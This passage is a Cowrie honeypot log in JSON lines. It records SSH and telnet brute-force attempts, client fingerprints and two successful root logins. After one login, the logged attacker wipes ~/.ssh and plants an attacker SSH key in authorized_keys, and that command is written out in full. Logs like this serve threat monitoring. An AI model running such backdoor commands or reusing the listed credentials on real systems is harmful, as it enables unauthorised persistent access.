{"eventid":"cowrie.session.connect","src_ip":"3.131.215.38","src_port":39862,"dst_ip":"1.2.3.4","dst_port":23,"session":"847d9c4827ab","protocol":"telnet","message":"New connection: 3.131.215.38:39862 (1.2.3.4:23) [session: 847d9c4827ab]","sensor":"my-vps","timestamp":"2025-08-26T04:26:47.405386Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46232,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d97f9715115","protocol":"ssh","message":"New connection: 212.227.235.229:46232 (1.2.3.4:22) [session: 2d97f9715115]","sensor":"my-vps","timestamp":"2025-08-26T04:26:47.428384Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:26:47.428966Z","src_ip":"212.227.235.229","session":"2d97f9715115"}
{"eventid":"cowrie.session.closed","duration":0.039714813232421875,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:26:47.444994Z","src_ip":"3.131.215.38","session":"847d9c4827ab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:26:47.504552Z","src_ip":"212.227.235.229","session":"2d97f9715115"}
{"eventid":"cowrie.login.failed","username":"mdm","password":"mdm","message":"login attempt [mdm/mdm] failed","sensor":"my-vps","timestamp":"2025-08-26T04:26:47.848014Z","src_ip":"212.227.235.229","session":"2d97f9715115"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:26:48.925492Z","src_ip":"212.227.235.229","session":"2d97f9715115"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32852,"dst_ip":"1.2.3.4","dst_port":22,"session":"1751c1bd5125","protocol":"ssh","message":"New connection: 212.227.235.229:32852 (1.2.3.4:22) [session: 1751c1bd5125]","sensor":"my-vps","timestamp":"2025-08-26T04:27:06.147539Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:27:06.149193Z","src_ip":"212.227.235.229","session":"1751c1bd5125"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:27:07.384944Z","src_ip":"212.227.235.229","session":"1751c1bd5125"}
{"eventid":"cowrie.login.failed","username":"sa","password":"sa123456","message":"login attempt [sa/sa123456] failed","sensor":"my-vps","timestamp":"2025-08-26T04:27:08.138276Z","src_ip":"212.227.235.229","session":"1751c1bd5125"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:27:09.391883Z","src_ip":"212.227.235.229","session":"1751c1bd5125"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":52290,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ad2a606f63d","protocol":"ssh","message":"New connection: 68.183.87.241:52290 (1.2.3.4:22) [session: 8ad2a606f63d]","sensor":"my-vps","timestamp":"2025-08-26T04:27:17.747660Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:27:18.999640Z","src_ip":"68.183.87.241","session":"8ad2a606f63d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:27:19.267176Z","src_ip":"68.183.87.241","session":"8ad2a606f63d"}
{"eventid":"cowrie.login.failed","username":"snarkos","password":"123456","message":"login attempt [snarkos/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T04:27:21.206789Z","src_ip":"68.183.87.241","session":"8ad2a606f63d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49984,"dst_ip":"1.2.3.4","dst_port":22,"session":"b351d29f2e2b","protocol":"ssh","message":"New connection: 212.227.235.229:49984 (1.2.3.4:22) [session: b351d29f2e2b]","sensor":"my-vps","timestamp":"2025-08-26T04:27:22.450713Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T04:27:22.451620Z","src_ip":"212.227.235.229","session":"b351d29f2e2b"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:27:22.524051Z","src_ip":"68.183.87.241","session":"8ad2a606f63d"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T04:27:22.580220Z","src_ip":"212.227.235.229","session":"b351d29f2e2b"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T04:27:23.180141Z","src_ip":"212.227.235.229","session":"b351d29f2e2b"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:27:24.312105Z","src_ip":"212.227.235.229","session":"b351d29f2e2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47164,"dst_ip":"1.2.3.4","dst_port":22,"session":"924ed7dbaa45","protocol":"ssh","message":"New connection: 212.227.235.229:47164 (1.2.3.4:22) [session: 924ed7dbaa45]","sensor":"my-vps","timestamp":"2025-08-26T04:27:30.238267Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:27:30.239135Z","src_ip":"212.227.235.229","session":"924ed7dbaa45"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:27:30.516051Z","src_ip":"212.227.235.229","session":"924ed7dbaa45"}
{"eventid":"cowrie.login.failed","username":"daniel","password":"1234","message":"login attempt [daniel/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T04:27:31.667411Z","src_ip":"212.227.235.229","session":"924ed7dbaa45"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:27:32.947645Z","src_ip":"212.227.235.229","session":"924ed7dbaa45"}
{"eventid":"cowrie.session.connect","src_ip":"3.131.215.38","src_port":60998,"dst_ip":"1.2.3.4","dst_port":23,"session":"057324725400","protocol":"telnet","message":"New connection: 3.131.215.38:60998 (1.2.3.4:23) [session: 057324725400]","sensor":"my-vps","timestamp":"2025-08-26T04:27:37.392529Z"}
{"eventid":"cowrie.session.closed","duration":10.010948657989502,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:27:47.403369Z","src_ip":"3.131.215.38","session":"057324725400"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52940,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9093b2749cf","protocol":"ssh","message":"New connection: 212.227.235.229:52940 (1.2.3.4:22) [session: f9093b2749cf]","sensor":"my-vps","timestamp":"2025-08-26T04:27:49.207620Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:27:49.208353Z","src_ip":"212.227.235.229","session":"f9093b2749cf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:27:49.280570Z","src_ip":"212.227.235.229","session":"f9093b2749cf"}
{"eventid":"cowrie.login.success","username":"root","password":"Qaz123321","message":"login attempt [root/Qaz123321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:27:49.610979Z","src_ip":"212.227.235.229","session":"f9093b2749cf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:27:49.803065Z","src_ip":"212.227.235.229","session":"f9093b2749cf"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:27:49.803758Z","src_ip":"212.227.235.229","session":"f9093b2749cf"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:27:49.804495Z","src_ip":"212.227.235.229","session":"f9093b2749cf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:27:49.877593Z","src_ip":"212.227.235.229","session":"f9093b2749cf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:27:50.079362Z","src_ip":"212.227.235.229","session":"f9093b2749cf"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:27:50.080078Z","src_ip":"212.227.235.229","session":"f9093b2749cf"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:27:50.154406Z","src_ip":"212.227.235.229","session":"f9093b2749cf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:27:50.155361Z","src_ip":"212.227.235.229","session":"f9093b2749cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52956,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0c95c0ecf20","protocol":"ssh","message":"New connection: 212.227.235.229:52956 (1.2.3.4:22) [session: b0c95c0ecf20]","sensor":"my-vps","timestamp":"2025-08-26T04:27:50.224363Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:27:50.225315Z","src_ip":"212.227.235.229","session":"b0c95c0ecf20"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:27:50.297116Z","src_ip":"212.227.235.229","session":"b0c95c0ecf20"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:27:50.624190Z","src_ip":"212.227.235.229","session":"b0c95c0ecf20"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:27:51.697671Z","src_ip":"212.227.235.229","session":"b0c95c0ecf20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52966,"dst_ip":"1.2.3.4","dst_port":22,"session":"a42095b13e5d","protocol":"ssh","message":"New connection: 212.227.235.229:52966 (1.2.3.4:22) [session: a42095b13e5d]","sensor":"my-vps","timestamp":"2025-08-26T04:27:51.769669Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:27:51.770429Z","src_ip":"212.227.235.229","session":"a42095b13e5d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:27:51.842978Z","src_ip":"212.227.235.229","session":"a42095b13e5d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:27:52.175747Z","src_ip":"212.227.235.229","session":"a42095b13e5d"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:27:52.250074Z","src_ip":"212.227.235.229","session":"f9093b2749cf"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:27:52.250813Z","src_ip":"212.227.235.229","session":"a42095b13e5d"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":40446,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e9927192d48","protocol":"ssh","message":"New connection: 103.217.145.104:40446 (1.2.3.4:22) [session: 6e9927192d48]","sensor":"my-vps","timestamp":"2025-08-26T04:27:55.800409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:27:55.801349Z","src_ip":"103.217.145.104","session":"6e9927192d48"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecds